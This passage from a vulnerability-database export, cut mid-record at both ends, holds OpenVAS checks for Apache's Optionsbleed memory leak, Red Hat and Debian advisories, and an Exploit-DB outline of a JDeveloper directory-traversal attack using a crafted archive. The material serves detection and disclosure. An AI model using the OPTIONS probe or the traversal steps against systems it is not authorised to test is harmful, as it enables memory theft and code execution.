script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/100872\");\n script_xref(name:\"URL\", value:\"https://archive.apache.org/dist/httpd/patches/apply_to_2.2.34/\");\n script_xref(name:\"URL\", value:\"https://www.apache.org/dist/httpd/CHANGES_2.4.28\");\n\n script_tag(name:\"summary\", value:\"Apache HTTP server allows remote attackers to read secret data\n from process memory if the Limit directive can be set in a user's .htaccess file, or if httpd.conf\n has certain misconfigurations, aka Optionsbleed.\");\n\n script_tag(name:\"vuldetect\", value:\"This script checks for a corrupted Allow header that is being\n constructed in response to HTTP OPTIONS requests.\");\n\n script_tag(name:\"insight\", value:\"Optionsbleed is a use after free error in Apache HTTP server that\n causes a corrupted Allow header to be constructed in response to HTTP OPTIONS requests. This can leak\n pieces of arbitrary memory from the server process that may contain secrets. The memory pieces change\n after multiple requests, so for a vulnerable host an arbitrary number of memory chunks can be leaked.\n\n The bug appears if a webmaster tries to use the 'Limit' directive with an invalid HTTP method.\n\n Example .htaccess:\n\n <Limit abcxyz>\n </Limit>\");\n\n script_tag(name:\"impact\", value:\"The successful exploitation allows the attacker to read chunks of the\n host's memory.\");\n\n script_tag(name:\"affected\", value:\"Apache HTTP Server 2.2.x versions up to 2.2.34 and 2.4.x below 2.4.28.\");\n\n script_tag(name:\"solution\", value:\"Update to Apache HTTP Server 2.4.28. For Apache HTTP Server running\n version 2.2.34 apply the patch linked in the references.\n\n As a workaround the usage of .htaccess should be disabled competely via the 'AllowOverride None'\n directive within the webservers configuration. Furthermore all <Limit> statements within the\n webserver configuration needs to be verified for invalid HTTP methods.\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\n\nif(!port = get_app_port(cpe:CPE)) exit(0);\nget_app_location(cpe:CPE, port:port, nofork:TRUE); # To have a reference to the Detection-NVT\n\nuseragent = http_get_user_agent();\nhost = http_host_name(port:port);\n\n#TODO: Once this vulnerability got older we might want to consider to limit the amounts of directories to check here\nforeach dir(make_list_unique(\"/\", http_cgi_dirs(port:port)))\n{\n\n if(dir == \"/\") dir = \"\";\n url = dir + \"/\";\n\n req = 'OPTIONS ' + url + ' HTTP/1.1\\r\\n' +\n 'Host: ' + host + '\\r\\n' +\n 'User-Agent: ' + useragent + '\\r\\n' +\n 'Connection: Close\\r\\n\\r\\n';\n\n for(i = 0; i <= 100; i++)\n {\n res = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);\n if(res =~ \"^HTTP/1\\.[01] 405\" ) break; # We don't need to continue in this inner loop if the OPTIONS method is disabled.\n if(allow = egrep(string:res, pattern:\"^Allow: .*\" ))\n {\n # Examples:\n # Allow: POST,OPTIONS,,HEAD,:09:44 GMT\n # Allow: ,GET,HEAD,POST,OPTIONS\n # Allow: HEAD,,HEAD,POST,,HEAD,TRACE\n # Allow: POST,OPTIONS,GET,HEAD,,HEAD,write.c>\n if(vuln = eregmatch(pattern:\"(\\,{2,}|\\,\\W+\\,|^\\w+\\:[\\s]{0,}\\,|\\d)\", string:allow))\n {\n report = \"The remote service might leak data/memory via the 'Allow' header.\";\n report += '\\n\\nRequest:\\n' + req + '\\nResponse:\\n' + res;\n security_message(port:port, data:report);\n exit(0);\n }\n }\n }\n}\n\nexit(99);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-01-29T20:09:29", "description": "Hanno Boeck discovered that incorrect parsing of Limit directives of\n.htaccess files by the Apache HTTP Server could result in memory\ndisclosure.", "cvss3": {}, "published": "2018-02-07T00:00:00", "type": "openvas", "title": "Debian LTS: Security Advisory for apache2 (DLA-1102-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-9798"], "modified": "2020-01-29T00:00:00", "id": "OPENVAS:1361412562310891102", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891102", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891102\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2017-9798\");\n script_name(\"Debian LTS: Security Advisory for apache2 (DLA-1102-1)\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-02-07 00:00:00 +0100 (Wed, 07 Feb 2018)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2017/09/msg00019.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n\n script_tag(name:\"affected\", value:\"apache2 on Debian Linux\");\n\n script_tag(name:\"solution\", value:\"For Debian 7 'Wheezy', these problems have been fixed in version\n2.2.22-13+deb7u12.\n\nWe recommend that you upgrade your apache2 packages.\");\n\n script_tag(name:\"summary\", value:\"Hanno Boeck discovered that incorrect parsing of Limit directives of\n.htaccess files by the Apache HTTP Server could result in memory\ndisclosure.\");\n\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"apache2\", ver:\"2.2.22-13+deb7u12\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"apache2-dbg\", ver:\"2.2.22-13+deb7u12\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.2.22-13+deb7u12\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"apache2-mpm-event\", ver:\"2.2.22-13+deb7u12\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"apache2-mpm-itk\", ver:\"2.2.22-13+deb7u12\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"apache2-mpm-prefork\", ver:\"2.2.22-13+deb7u12\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"apache2-mpm-worker\", ver:\"2.2.22-13+deb7u12\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"apache2-prefork-dev\", ver:\"2.2.22-13+deb7u12\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"apache2-suexec\", ver:\"2.2.22-13+deb7u12\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"apache2-suexec-custom\", ver:\"2.2.22-13+deb7u12\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"apache2-threaded-dev\", ver:\"2.2.22-13+deb7u12\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.2.22-13+deb7u12\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"apache2.2-bin\", ver:\"2.2.22-13+deb7u12\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"apache2.2-common\", ver:\"2.2.22-13+deb7u12\", rls:\"DEB7\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:34:26", "description": "Check the version of httpd", "cvss3": {}, "published": "2017-10-12T00:00:00", "type": "openvas", "title": "CentOS Update for httpd CESA-2017:2882 centos7", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-9798"], "modified": "2019-03-08T00:00:00", "id": "OPENVAS:1361412562310882784", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882784", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_CESA-2017_2882_httpd_centos7.nasl 14058 2019-03-08 13:25:52Z cfischer $\n#\n# CentOS Update for httpd CESA-2017:2882 centos7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882784\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-10-12 10:25:42 +0200 (Thu, 12 Oct 2017)\");\n script_cve_id(\"CVE-2017-9798\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for httpd CESA-2017:2882 centos7\");\n script_tag(name:\"summary\", value:\"Check the version of httpd\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The httpd packages provide the Apache\nHTTP Server, a powerful, efficient, and extensible web server.\n\nSecurity Fix(es):\n\n * A use-after-free flaw was found in the way httpd handled invalid and\npreviously unregistered HTTP methods specified in the Limit directive used\nin an .htaccess file. A remote attacker could possibly use this flaw to\ndisclose portions of the server memory, or cause httpd child process to\ncrash. (CVE-2017-9798)\n\nRed Hat would like to thank Hanno Bock for reporting this issue.\");\n script_tag(name:\"affected\", value:\"httpd on CentOS 7\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"CESA\", value:\"2017:2882\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2017-October/022565.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS7\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.4.6~67.el7.centos.5\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.4.6~67.el7.centos.5\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.4.6~67.el7.centos.5\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-tools\", rpm:\"httpd-tools~2.4.6~67.el7.centos.5\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ldap\", rpm:\"mod_ldap~2.4.6~67.el7.centos.5\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_proxy_html\", rpm:\"mod_proxy_html~2.4.6~67.el7.centos.5\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_session\", rpm:\"mod_session~2.4.6~67.el7.centos.5\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.4.6~67.el7.centos.5\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:34:00", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-10-12T00:00:00", "type": "openvas", "title": "RedHat Update for httpd RHSA-2017:2882-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-9798"], "modified": "2018-11-23T00:00:00", "id": "OPENVAS:1361412562310812035", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812035", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_RHSA-2017_2882-01_httpd.nasl 12497 2018-11-23 08:28:21Z cfischer $\n#\n# RedHat Update for httpd RHSA-2017:2882-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812035\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-10-12 10:24:50 +0200 (Thu, 12 Oct 2017)\");\n script_cve_id(\"CVE-2017-9798\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for httpd RHSA-2017:2882-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'httpd'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The httpd packages provide the Apache HTTP\nServer, a powerful, efficient, and extensible web server.\n\nSecurity Fix(es):\n\n * A use-after-free flaw was found in the way httpd handled invalid and\npreviously unregistered HTTP methods specified in the Limit directive used\nin an .htaccess file. A remote attacker could possibly use this flaw to\ndisclose portions of the server memory, or cause httpd child process to\ncrash. (CVE-2017-9798)\n\nRed Hat would like to thank Hanno Bck for reporting this issue.\");\n script_tag(name:\"affected\", value:\"httpd on Red Hat Enterprise Linux Server (v. 7)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"RHSA\", value:\"2017:2882-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2017-October/msg00010.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_7\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.4.6~67.el7_4.5\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.4.6~67.el7_4.5\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-debuginfo\", rpm:\"httpd-debuginfo~2.4.6~67.el7_4.5\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.4.6~67.el7_4.5\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-tools\", rpm:\"httpd-tools~2.4.6~67.el7_4.5\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_session\", rpm:\"mod_session~2.4.6~67.el7_4.5\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.4.6~67.el7_4.5\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "exploitdb": [{"lastseen": "2023-06-07T15:32:16", "description": "", "cvss3": {"exploitabilityScore": 0.6, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "baseScore": 4.7, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:H/UI:R/S:C/C:L/I:L/A:L", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.7}, "published": "2018-01-21T00:00:00", "type": "exploitdb", "title": "Oracle JDeveloper 11.1.x/12.x - Directory Traversal", "bulletinFamily": "exploit", "cvss2": {"severity": "LOW", "exploitabilityScore": 1.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 3.7, "vectorString": "AV:L/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["2017-10273", "CVE-2017-10273"], "modified": "2018-01-21T00:00:00", "id": "EDB-ID:43848", "href": "https://www.exploit-db.com/exploits/43848", "sourceData": "[+] Credits: John Page (aka hyp3rlinx)\n[+] Website: hyp3rlinx.altervista.org\n[+] Source: http://hyp3rlinx.altervista.org/advisories/ORACLE-JDEVELOPER-DIRECTORY-TRAVERSAL.txt\n[+] ISR: apparition security\n\n\nVendor:\n=============\nwww.oracle.com\n\n\nProduct:\n===========\nJDeveloper IDE\n\nOracle JDeveloper is a free integrated development environment that simplifies the development of Java-based\napplications addressing every step of the application lifecycle.\n\n\n\nVulnerability Type:\n===================\nDirectory Traversal\n\n\n\nCVE Reference:\n==============\nCVE-2017-10273\n\n\n\nSecurity Issue:\n================\nAttackers can place malicious files outside intended target directories if tricked into importing corrupt .WAR or .EAR archives.\nLater, attackers can potentially request these scripts/files to execute system commands on affected target.\n\n\nAffected versions:\n11.1.1.7.0, 11.1.1.7.1, 11.1.1.9.0, 11.1.2.4.0, 12.1.3.0.0, 12.2.1.2.0\n\n\nReferences:\n============\nhttp://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html\n\n\n\nExploit/POC:\n=============\n1) create evil .WAR or .EAR archive containing ../ in path name to initiate directory traversal and inside a script to execute system commands.\n2) import into JDeveloper\n3) files get moved outside target directories to one of the attackers choosing.\n4) attacker requests the malicious file contained in target directory.\n\nBAM!\n\n\nNetwork Access:\n===============\nLocal\n\n\n\nSeverity:\n=========\nLow\n\n\n\nDisclosure Timeline:\n=============================\nVendor Notification: October 14, 2016\nVendor fixes as part of CPU January 16, 2018\nJanuary 17, 2018 : Public Disclosure\n\n\n\n[+] Disclaimer\nThe information contained within this advisory is supplied \"as-is\" with no warranties or guarantees of fitness of use or otherwise.\nPermission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and\nthat due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit\nis given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility\nfor any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information\nor exploits by the author or elsewhere. All content (c).\n\nhyp3rlinx", "sourceHref": "https://gitlab.com/exploit-database/exploitdb/-/raw/main/exploits/java/webapps/43848.txt", "cvss": {"score": 3.7, "vector": "AV:L/AC:H/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2023-05-25T16:21:22", "description": "The httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server.\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols, as well as a full-strength general-purpose cryptography library.\n\nApache Tomcat is a servlet container for the Java Servlet and JavaServer Pages (JSP) technologies.\n\nThis release provides an update to httpd, OpenSSL and Tomcat 6/7 for Red Hat JBoss Web Server 2.1.2. The updates are documented in the Release Notes document linked to in the References.\n\nThis release of Red Hat JBoss Web Server 2.1.2 Service Pack 2 serves as a update for Red Hat JBoss Web Server 2, and includes bug fixes, which are documented in the Release Notes document linked to in the References.\n\nUsers of Red Hat JBoss Web Server 2 should upgrade to these updated packages, which resolve several security issues.\n\nSecurity Fix(es):\n\n* It was discovered that the httpd's mod_auth_digest module did not properly initialize memory before using it when processing certain headers related to digest authentication. A remote attacker could possibly use this flaw to disclose potentially sensitive information or cause httpd child process to crash by sending specially crafted requests to a server. (CVE-2017-9788)\n\n* A vulnerability was discovered in Tomcat where if a servlet context was configured with readonly=false and HTTP PUT requests were allowed, an attacker could upload a JSP file to that context and achieve code execution. (CVE-2017-12615)\n\n* A vulnerability was discovered in Tomcat where if a servlet context was configured with readonly=false and HTTP PUT requests were allowed, an attacker could upload a JSP file to that context and achieve code execution. (CVE-2017-12617)\n\n* A flaw was found in the way the DES/3DES cipher was used as part of the TLS/SSL protocol. A man-in-the-middle attacker could use this flaw to recover some plaintext data by capturing large amounts of encrypted traffic between TLS/SSL server and client if the communication used a DES/3DES based ciphersuite. (CVE-2016-2183)\n\n* A use-after-free flaw was found in the way httpd handled invalid and previously unregistered HTTP methods specified in the Limit directive used in an .htaccess file. A remote attacker could possibly use this flaw to disclose portions of the server memory, or cause httpd child process to crash. (CVE-2017-9798)\n\nRed Hat would like to thank OpenVPN for reporting CVE-2016-2183 and Hanno B\u00f6ck for reporting CVE-2017-9798. Upstream acknowledges Karthikeyan Bhargavan (Inria) and Ga\u00ebtan Leurent (Inria) as the original reporters of CVE-2016-2183.\n\nBug Fix(es):\n\n* Corruption in nodestatsmem in multiple core dumps but in different functions of each core dump. (BZ#1338640)\n\n* mod_cluster segfaults in process_info() due to wrongly generated assembler instruction movslq (BZ#1448709)\n\n* CRL checking of very large CRLs fails with OpenSSL 1.0.2 (BZ#1493075)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2017-11-02T19:03:10", "type": "redhat", "title": "(RHSA-2017:3113) Important: Red Hat JBoss Web Server security and bug fix update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2183", "CVE-2017-12615", "CVE-2017-12617", "CVE-2017-9788", "CVE-2017-9798"], "modified": "2018-06-06T22:42:48", "id": "RHSA-2017:3113", "href": "https://access.redhat.com/errata/RHSA-2017:3113", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-25T16:21:22", "description": "The httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server.\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols, as well as a full-strength general-purpose cryptography library.\n\nApache Tomcat is a servlet container for the Java Servlet and JavaServer Pages (JSP) technologies.\n\nThis release provides an update to httpd, OpenSSL and Tomcat 6/7 for Red Hat JBoss Web Server 2. The updates are documented in the Release Notes document linked to in the References.\n\nThis release of Red Hat JBoss Web Server 2.1.2 Service Pack 2 serves as a update for Red Hat JBoss Web Server 2, and includes bug fixes, which are documented in the Release Notes document linked to in the References.\n\nUsers of Red Hat JBoss Web Server 2 should upgrade to these updated packages, which resolve several security issues\n\nSecurity Fix(es):\n\n* It was discovered that the httpd's mod_auth_digest module did not properly initialize memory before using it when processing certain headers related to digest authentication. A remote attacker could possibly use this flaw to disclose potentially sensitive information or cause httpd child process to crash by sending specially crafted requests to a server. (CVE-2017-9788)\n\n* A vulnerability was discovered in Tomcat where if a servlet context was configured with readonly=false and HTTP PUT requests were allowed, an attacker could upload a JSP file to that context and achieve code execution. (CVE-2017-12615)\n\n* A vulnerability was discovered in Tomcat where if a servlet context was configured with readonly=false and HTTP PUT requests were allowed, an attacker could upload a JSP file to that context and achieve code execution. (CVE-2017-12617)\n\n* A flaw was found in the way the DES/3DES cipher was used as part of the TLS/SSL protocol. A man-in-the-middle attacker could use this flaw to recover some plaintext data by capturing large amounts of encrypted traffic between TLS/SSL server and client if the communication used a DES/3DES based ciphersuite. (CVE-2016-2183)\n\n* A use-after-free flaw was found in the way httpd handled invalid and previously unregistered HTTP methods specified in the Limit directive used in an .htaccess file. A remote attacker could possibly use this flaw to disclose portions of the server memory, or cause httpd child process to crash. (CVE-2017-9798)\n\nRed Hat would like to thank OpenVPN for reporting CVE-2016-2183 and Hanno B\u00f6ck for reporting CVE-2017-9798. Upstream acknowledges Karthikeyan Bhargavan (Inria) and Ga\u00ebtan Leurent (Inria) as the original reporters of CVE-2016-2183.\n\nBug Fix(es):\n\n* Corruption in nodestatsmem in multiple core dumps but in different functions of each core dump. (BZ#1338640)\n\n* mod_cluster segfaults in process_info() due to wrongly generated assembler instruction movslq (BZ#1448709)\n\n* CRL checking of very large CRLs fails with OpenSSL 1.0.2 (BZ#1493075)\n\n* The jboss-ews-application-servers zip README contains incomplete description of fixed CVEs (BZ#1497953)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2017-11-02T19:03:45", "type": "redhat", "title": "(RHSA-2017:3114) Important: Red Hat JBoss Web Server security and bug fix update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", 